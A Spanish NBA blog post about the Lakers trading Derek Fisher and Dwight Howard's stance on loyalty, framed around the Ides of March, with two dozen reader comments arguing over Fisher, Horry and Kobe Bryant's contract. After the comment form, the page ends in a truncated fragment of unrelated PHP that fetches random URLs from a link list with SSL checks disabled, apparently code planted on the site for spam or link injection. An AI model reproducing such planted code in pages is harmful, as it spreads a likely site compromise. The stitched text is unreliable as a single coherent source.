Los idus de marzo

16 de March de 2012 por MagicJohnson32

¡Guárdate de los idus de marzo! (“Julio César”, William Shakespeare).

fish thanks

15 de marzo, día de la traición. Shakespeare situó en un 15 de marzo el asesinato de César a manos de varios de sus senadores y vinculó la fecha, conocida como los idus de marzo, a la corrupción moral que con demasiada frecuencia acarrea el poder y los intentos para alzarse con él.

15 de marzo, día del trade deadline de la NBA. Derek Fisher abandona los Lakers por la puerta de atrás, traspasado a ultimísima hora a los Rockets en un movimiento de motivaciones estrictamente económicas. Se marcha Fisher, despreciado por tantos y adorado por gran parte de los aficionados de los Lakers, quienes valoran su incontestable profesionalidad, su influencia como líder del vestuario, las trece temporadas dedicadas a la franquicia y, por supuesto, las canastas decisivas que tantas victorias han dado al equipo.

Mitch Kupchak, GM de los Lakers, compareció ayer por la tarde en rueda de prensa y aseguró que traspasar a Fisher había sido una decisión muy difícil pero también reconoció que no había hablado directamente con el jugador. ¿Qué ha de hacer un jugador para merecer una simple llamada telefónica? ¿No es suficiente con haber jugado los últimos 538 partidos de manera consecutiva, con ser integrante de las últimas cinco plantilla de los Lakers ganadoras del Anillo, con ser el co-capitán del equipo? Aparentemente, no.

Hoy, los Lakers son mejores como equipo pero peores como franquicia. Se marcha Fisher y con él se pierde buena parte del honor, la dignidad y el sentido de la lealtad que acompaña al deporte profesional, si es que todavía queda algo de eso. 

howardAunque, por otra parte, también fue ayer, 15 de marzo, cuando Dwight Howard se atrevió a definirse como “demasiado leal” ante los medios de comunicación, en un intento ridículo por explicar las dificultades por las que ha pasado estos últimos días. El pívot, posiblemente mal aconsejado, ha jugueteado con la franquicia y ha lanzado mensajes de tan mal gusto como aquell “Roll the dice” (literalmente, “lanzar los dados”), en los que invitaba a los Magic a no traspasarlo y arriesgarse a quedar expuestos a la marcha del jugador tras la finalización de la temporada. Orlando ha actuado con el mínimo de prudencia que requería la situación y le ha exigido al jugador que renuncie a la opción para convertirse en agente libre este mismo año. ¿Dónde está, pues, la lealtad? Que quede claro: la decisión tomada por Howard ayer simplemente aplaza un año lo inevitable. No ha firmado una extensión de contrato y nada sugiere que lo acabe haciendo.

“Just business”, se acostumbra a decir en la NBA en estos casos. Y uno, que se empeña en entender esto como cualquier cosa salvo un negocio, que todavía cree en cosas tan anacrónicas como el amor a unos colores, se ve ante la obligación de reconocer la evidencia. Porque la actitud de Howard no ha sido nada personal, solo negocios. Que los aficionados de los Cavs tuviesen que soportar un especial de la ESPN para enterarse de que LeBron se iba a los Heat, efectivamente, fue solo negocios. ¿La marcha de Derek Fisher a Houston? Solo negocios. No me extrañaría que Bruto, en el momento de asesinar a César, le dijese: “Just business”.

Comenta

24 comentarios a esta entrada

  1. Toni dice:
    #1

    Muy grande Magic! La comparación de Fish es sublime…
    Puestos a tirar de culturilla, mi guinda hubiera sido disfrazar a Howard de Michael Corleone (durante esta semana pasada, se cumplió el 40 aniversario del estreno del primer film de la trilogía) diciendo: It’s not personal, Sonny, It’s strictly business.

      Citar

  2. Vader dice:
    #2

    Exacto, pero tampoco se puede pedir mucha lealtad a los jugadores cuando a un tio como Fisher no le pueden hacer una simple llamada de tlf… Si acaso se deberian mejorar las formas en ambos lados.

      Citar

  3. nba dice:
    #3

    Seguro que Kobe se despacha a gusto con Mitch poniendolo a parir por la forma en que lo ha realizado

      Citar

  4. Esteban dice:
    #4

    Me parece un super movimiento de los lakers, se scan de encima un base malo q por historia debeia ser titular, pero hundia al equipo, lamento por fisher pero sus años de gloria pasaron

    Ewing no fue enviado a seatle? Olajuwon a toronto? Shaq ni hablar, jordan no termino de sexto hombre en wizards?
    Cuando un jugador se pone viejo debe aceptar terminar de esa manera, esperen, por q pronto le tocara a pau, quiza desp de este año

      Citar

  5. Txusma dice:
    #5

    Creo q el ejemplo de Jordan no tiene absolutamente nada que ver. Él no fue traspasado nunca.

      Citar

  6. Esteban dice:
    #6

    Pero termino de suplente, digo, parecia q fisher debia ser el base titular del equipo o era una deshonra, ahora dos problemas menos, el salario de fisher, y la obligacion moral de q sea titular y q cierre los partidos

      Citar

  7. HisRoyalAirness dice:
    #7

    Jordan? Pero qué coño? Se te ha ido la pinza.

    A todo esto, a mí lo de Fisher me parece logiquísimo. Una puñalada, sí, pero parece que hablàis como si hubiesen traspasado a Kobe. Hoy los Lakers tienen màs oportunidades de competir por el anillo que la semana pasada, eso es así.
    Yo recuerdo a Phil haciendo ajustes y poniendo a Kobe a defender a Rondo o a Westbrook por el traje que estaban hacièndole a Fisher, con lo que eso implica en ataque. O el record de triples en las Finales que le cascó Allen en todas las fauces

      Citar

  8. Denise dice:
    #8

    HisRoyalAirness: Jordan? Pero qué coño? Se te ha ido la pinza.A todo esto, a mí lo de Fisher me parece logiquísimo. Una puñalada, sí, pero parece que hablàis como si hubiesen traspasado a Kobe. Hoy los Lakers tienen màs oportunidades de competir por el anillo que la semana pasada, eso es así.Yo recuerdo a Phil haciendo ajustes y poniendo a Kobe a defender a Rondo o a Westbrook por el traje que estaban hacièndole a Fisher, con lo que eso implica en ataque. O el record de triples en las Finales que le cascó Allen en todas las fauces

    Pues yo si hubiesen traspasado a Kobe lo hubiese visto menos traición, porque si traspasan a Kobe, es para con sus 25 kilos traer a 2-3 buenos jugadores que mejoren el equipo y lo hagan mas profundo; en cambiar traspasar a Fisher al que le quedan 2 meses como profesional para traer a un manta como Hill que no mejora el equipo, lo veo como una gran patada en el ciezo.
    No me vengais con el rollo de que lo traspasan para conseguir espactio salarial, que los 3 kilos de Fisher no suponen nada. Para eso, que hubiesen traspasado a Blake que cobra mas que Fisher.

      Citar

  9. Jose Luis dice:
    #9

    Varias cosas con las que no estoy de acuerdo, HisRoyal:

    A Rondo lo cubría Bryant porque así se desgastaba menos, ya que sólo era flotarle y estar atento a las líneas de pase, y no tenía que corretear sin parar tras Allen. A Westbrook si pidió el cubrirlo, ya que con un 2-2 en la 1ª ronda no era plan de que los Lakers se fueran para casa.

    El día de los triples de Allen, le cubrió Fisher y le cubrió Bryant, aparte de que algunos fueron en transición y totalmente sólo, y Fisher siempre va a la zona en estos casos a intentar sacar la falta en ataque.

    A mí no me ha parecido bien, para eso que hubieran traspasado a Blake. Quiero escuchar o leer lo que ha dicho Kobe sobre este movimiento.

      Citar

  10. Sancho88 dice:
    #10

    Yo también me declaro un romántico, y me acuerdo de aquellas madrugadas de primavera, casi verano, a las siete de la mañana, con los ojos borrosos por el sueño, la ventana abierta de la habitación, que dejaba entrar la brisilla esa de la noche que tanto se agradece durante esos días, y Derek Fisher metiendo un triple. Eran las series finales contra Orlando, también contra Celtics. El ex jugador jamás fallaba esos días. Yo me quedo con esa imagen, y me parece una guarrada lo que le han hecho, como ya publiqué en el post de los traspasos…

      Citar

  11. Sancho88 dice:
    #11

    y digo ex jugador con toda la ironía del mundo, lógicamente, porque es lo que siempre decía todo el mundo en esas series. Derek Fisher es un ex jugador, el ex jugador no puede defender a Rondo, el ex jugador no se qué… el ex jugador, realmente, ayudó en 5 anillos. Para ser ex jugador, no debía ser tan malo, no? Es un poco lo que pasa con Raúl, todo dios criticándole, y el pavo siendo el máximo anotador de la historia de las competiciones europeas…

      Citar

  12. HisRoyalAirness dice:
    #12

    No creo que sea comparable, a Raùl se le critica por su falta de calidad y su oportunismo, no porque su equipo pudiera ser mejor sin él (sí en sus últimos años).
    Lo de que Fisher ayudó en 5 anillos…bien, de acuerdo, pero me parece muy osado y muy mitómano aventurar que el papel que cumplió él no podía hacerlo otro. Es que lo del triple contra los Spurs se tiene como la madre de las jugadas y fue una chorra acojonante. Saliò, de acuerdo, pero no porque fuese él.
    Yo siempre que decís estas cosas digo que entonces Robert “Big Shot Bob” Horry, según esta regla de 3, sería uno de los mejores jugadores de todos los tiempos.
    Y todo con el mayor de los respetos hacia Fish pero antes la excusa era que en el triángulo de Phill no hacía falta un base puro y se adaptaba perfectamente a ese rol. Ahora ya no

      Citar

  13. Txusma dice:
    #13

    Esteban:
    Pero termino de suplente, digo,

    De suplente de quien? Jordan jugó 37 minutos por partido en los Wizards cuando tenía 39 años y anotaba 20 puntos, pillaba 6 rebotes y repartia 4 asistencia por partido. Jugó 67 partidos como titular. Era el mejor de aquel equipo y de calle. Stackhouse era el único que aportaba aparte suyo.

    Sobre el tema Fisher, hago una pregunta a los amarillos y a los románticos. Creeis que Fisher hubiera renunciado a los 3’4 millones que hubiera cobrado la siguiente temporada? Pq tiene una Player Option. Si tan de los Lakers fuera, se habría retirado al acabar esta campaña o hubiera salido al mercado de agentes libres, no?
    Y otra: en 2004, poco después de anotar aquel triple a falta de 0’4 segundos, Derek Fisher se fue por su propio pie a Golden State, que parece que se olvida. Los Lakers le ofrecieron un contrato de jugador de rol (3 años de contrato por unos 15 millones y 15-20 minutos por partido) y en cambio GS le prometió que sería titular y le ofreció 6 años de contrato cobrando 6 kilos al año. Bussiness is bussiness.

      Citar

  14. Txusma dice:
    #14

    Jose Luis:
    Varias cosas con las que no estoy de acuerdo, HisRoyal:

    A mí no me ha parecido bien, para eso que hubieran traspasado a Blake. Quiero escuchar o leer lo que ha dicho Kobe sobre este movimiento.

    2 posibilidades:
    – En realidad los Lakers prefieren tener a Blake en el equipo que a Fisher
    – El contrato de Blake es bastante incolocable. Aparte de esta temporada le quedan 2 más cobrando 4 kilos en cada una.

      Citar

  15. Sancho88 dice:
    #15

    Nunca entenderé el fenómeno hater en torno a estrellas consagradas…. es algo que no cabe en mi cabeza. Ni con Fisher, ni con Raúl, ni con mitos del deporte que, de repente, todo el mundo se olvida de lo que han hecho, o, simplemente, los desacreditan por estar mayores, y parece que han sido unos paquetes toda su carrera. Pues sí, a mí personalmente me hubiera gustado ver a otro base ahí dando el tajo, que ganase los 5 anillos. Y no comparemos a Horry con Fisher, porque Horry ha sido un suplente toda su carrera, y su aportación en los anillos fueron únicamente triples puntuales o algún partido de inspiración. Él sí que tuvo suerte por aparecer en el roster de los equipos campeones, pero era un amuleto, no un jugador real. Para llegar a una edad avanzada y haber ganado tantos títulos, como Fisher, el tipo ha tenido que currar como una bestia, pero de repente se le desacredita como si no valiera de nada lo que ha hecho. Por favor, a ver si contextualizamos una carrera deportiva completa, y nos olvidamos si esta temporada estaba rindiendo mejor o peor, que está claro que no lo estaba haciendo bien, pero de ahí a quitarle méritos a todo lo que ha conseguido, y decir que cualquier otro lo habría hecho… eso me parece vergonzoso, por intentar desacreditar una serie de logros super complicados de igualar. El basket no es un deporte que gane Kobe Bryant. Kobe el solito, necesitaba un equipo, y un mejor jugador de equipo que Fisher a mí no se me ocurre… bueno sí, Odom y Pau. Ahora, en verano, Pau se irá a los Rockets, veremos donde acaban los Lakers. Que Bryant mucho llorar porque no se porta bien el equipo con sus compañeros, y poco bajarse el sueldo para que estos puedan continuar. Por tanto, sus palabras no me valen. No sé si se puede coger en la nba y decir, vale, quiero ganar el anillo, me bajo de 30 a 20 millones si retenéis a Pau. Si alguien puede explicarme si esto es posible, entonces ya sabré qué pensar sobre el susodicho Bryant

      Citar

  16. Jose Luis dice:
    #16

    No se puede hacer con el contrato ya firmado Sancho. Si podría haberlo hecho en el momento de firmar.

      Citar

  17. MagicJohnson32 dice:
    #17

    Uy, Sancho, me has tocado a Horry… esto es personal xDD

    Horry fue decisivo en todos y cada uno del os anillos que ganó. Eso sí, a su manera. Era un tío de 30-40 minutos por partido y titular indiscutible en los dos anillos que ganó en los Rockets. Echa un vistazo a los Playoffs del 95. Horry jugaba tanto como Drexler y era el tercer anotador del equipo tras Olajuwon y Drexler y el segundo reboteador.

    Fue a los Lakers y fue decisivo. Y fue a los Spurs y fue decisivo.

      Citar

  18. MagicJohnson32 dice:
    #18

    Pero vamos a ver…

    ¿Que Bryant se baje el salario? ¿Entonces que tendrían que hacer todos aquellos jugadores que bajan su rendimiento cuando firman un contrato, aquellos que se lesionan, los que no tienen minutos porque el entrenador prefiere a otro o los que ya no son capaces de jugar a su máximo nivel por edad o lo que sea?

    Bryant, que le da a los Lakers millones de dólares en merchandising, en venta de derechos de TV (¿tú crees que sin Kobe los Lakers habrían conseguido cerrar un acuerdo de unos 5.000 millones como el que acaban de firmar con Time Warner?)… que es el tipo más currante de la NBA, que con 5 anillos y 16 temporadas en las piernas es un ejemplo de profesionalidad, que se pasa los veranos entrenándose, que durante el juicio en Coloralo volaba para llegar justo al partido y enchufarle 40 puntos a los Spurs, que jugó todo el año pasado con el tobillo, la rodilla y el hombro tronchados, que este año ha jugado con los ligamentos de la muñeca esguinzados y con una fractura nasal, que es el máximo anotador de la liga y el jugador que más minutos juega… ¡Venga hombre! :p)

      Citar

  19. MagicJohnson32 dice:
    #19

    Txusma:
    Sobre el tema Fisher, hago una pregunta a los amarillos y a los románticos. Creeis que Fisher hubiera renunciado a los 3’4 millones que hubiera cobrado la siguiente temporada? Pq tiene una Player Option. Si tan de los Lakers fuera, se habría retirado al acabar esta campaña o hubiera salido al mercado de agentes libres, no?
    Y otra: en 2004, poco después de anotar aquel triple a falta de 0’4 segundos, Derek Fisher se fue por su propio pie a Golden State, que parece que se olvida. Los Lakers le ofrecieron un contrato de jugador de rol (3 años de contrato por unos 15 millones y 15-20 minutos por partido) y en cambio GS le prometió que sería titular y le ofreció 6 años de contrato cobrando 6 kilos al año. Bussiness is bussiness.

    Quien no sepa que la canasta del 0.4 no fue un triple no merece hablar sobre Fisher xDDD

    Fisher no se fue por dinero, se fue para jugar. Y volvió a los Lakers renunciando a ganar bastante más en otro sitio. No se trata de que sea de los Lakers, se trata de todo lo que le ha dado a la franquicia. Y no se trata de que el equipo sea mejor con o sin Fisher, sino de todo lo que implica una salida como esta, con estas formas.

      Citar

  20. Sancho88 dice:
    #20

    No, yo lo único que digo es que Bryant está llorando todo el día porque están traspasando a Odom, Fisher, porque van a traspasar a Pau… él ya sabía que esto iba a pasar cuando firmó los 30 kilos, así que ahora que no diga gilipoyeces de cara a la galería

      Citar

  21. MagicJohnson32 dice:
    #21

    Pues chico, Kobe tiene que ser un visionario para saber, en el momento de la extensión de contrato, que en el verano de 2012 habría un lockout y que el nuevo convenio colectivo resultante penalizaría de una forma brutal a los equipos que repetidamente pagan impuesto de lujo, y que por ese motivo los Lakers tendrían que reducir drásticamente la masa salarial que acumulan, y que traspasarían a Gasol y Odom por Chris Paul, pero la liga lo vetaría, y entonces Odom exigiría el traspaso, y tan mal están las cosas que se lo regalan a los Mavs…

    Y, por cierto, los respondables de ofrecer contratos justos a los jugadores con Kupchak y Buss, no Kobe.

      Citar

  22. Txusma dice:
    #22

    MagicJohnson32: Quien no sepa que la canasta del 0.4 no fue un triple no merece hablar sobre Fisher xDDD

    Fisher no se fue por dinero, se fue para jugar. Y volvió a los Lakers renunciando a ganar bastante más en otro sitio. No se trata de que sea de los Lakers, se trata de todo lo que le ha dado a la franquicia. Y no se trata de que el equipo sea mejor con o sin Fisher, sino de todo lo que implica una salida como esta, con estas formas.

    Leches! Tenía la idea que había sido un triple. Pues nada, menos mérito… 😀

      Citar

  23. Denise dice:
    #23

    Sancho88:
    No, yo lo único que digo es que Bryant está llorando todo el día porque están traspasando a Odom, Fisher, porque van a traspasar a Pau… él ya sabía que esto iba a pasar cuando firmó los 30 kilos, así que ahora que no diga gilipoyeces de cara a la galería

    Eso mismo llevamos alguno diciendolo desde que firmó el contratazo, y es que hay que ser muy hipocrita y falso el firmar el contrato y luego quejarte, ¿como coj..quieres ganar otro anillo cuando vas a firmar un contrato que ocupa el 50% del espacio salarial e hipoteca el futuro?? Eso si, el mas culpable de la situacion es el que lo firma.
    Por eso llevo diciendo hace mucho, que lo mejor que le puede pasar a Pau es irse de Lakers, porque mientras él con su nuevo contrato, y Kobe con el suyo, jueguen juntos, dificilmente van a conseguir otro anillo.

      Citar

  24. Txusma dice:
    #24

    Si hay un jugador en la NBA que se merece cobrar casi 30 kilos por temporada ese es Kobe. No es solo por su rendimiento deportivo (q nos guste o no es y ha sido mucho) sinó por la cantidad de dinero que genera.
    Cuantas camisetas de Kobe ves en España? Cientos, miles. Tengo amigos que no tienen casi ninguna idea de la NBA y tienen su camiseta de Kobe. Ni Rose (q solo la tiene algún friki como yo), ni Durant, ni Dirk, ni Wade, ni siquiera Lebron… Y en toda Europa será igual y no te digo en China.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>